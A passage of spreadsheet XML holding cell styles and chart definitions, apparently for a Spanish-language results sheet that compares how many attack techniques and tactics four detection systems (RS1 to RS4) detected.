      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="10" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="17" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="18" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="19" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="20" fillId="8" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="21" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="29" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="23" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="25" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="6" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="3" fontId="32" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="11" fontId="9"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DETECTADAS POR RS1</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Resultados'!$K$27:$K$28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RS2</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Resultados'!$S$27:$S$28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RS3</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Resultados'!$T$27:$T$28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RS4</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Resultados'!$U$27:$U$28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w="19050">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Resultados'!$Y$31:$AB$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$Y$48:$AB$48</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1004718287"/>
        <c:axId val="1178556573"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="10047182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78556573"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="11785565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4718287"/>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PORCENTAJES TÁCTICAS IMPLEMENTADAS (TÉCNICAS)</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Lbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22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200">
              <a:solidFill>
                <a:srgbClr val="000000"/>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PORCENTAJES TÁCTICAS IMPLEMENTADAS (ATAQUES)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados'!$V$8:$V$9</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Lbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22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ATAQUES DETECTADOS POR TÁCTICA - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$R$10:$R$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1129112067"/>
        <c:axId val="2030879745"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="11291120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2030879745"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2030879745"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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9112067"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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ATAQUES DETECTADOS POR TÁCTICA - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$S$10:$S$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1597626904"/>
        <c:axId val="1272695451"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="15976269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272695451"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1272695451"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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7626904"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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ATAQUES DETECTADOS POR TÁCTICA - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$T$10:$T$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1887397136"/>
        <c:axId val="1176740353"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="18873971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176740353"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1176740353"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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87397136"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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ATAQUES DETECTADOS POR TÁCTICA - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$U$10:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1060605888"/>
        <c:axId val="1501289735"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="10606058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501289735"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1501289735"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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0605888"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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DETECTADAS POR RS2</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Resultados'!$L$27:$L$28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DETECTADAS POR RS3</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Resultados'!$M$27:$M$28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DETECTADAS POR RS4</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Resultados'!$N$27:$N$28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TÉCNICAS DETECTADAS POR TÁCTICA - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$K$10:$K$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1174594258"/>
        <c:axId val="1822162831"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="11745942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822162831"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1822162831"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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74594258"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="574109817"/>
        <c:axId val="1752385360"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="5741098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752385360"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1752385360"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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4109817"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1838955405"/>
        <c:axId val="1168301159"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="18389554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168301159"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1168301159"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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8955405"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
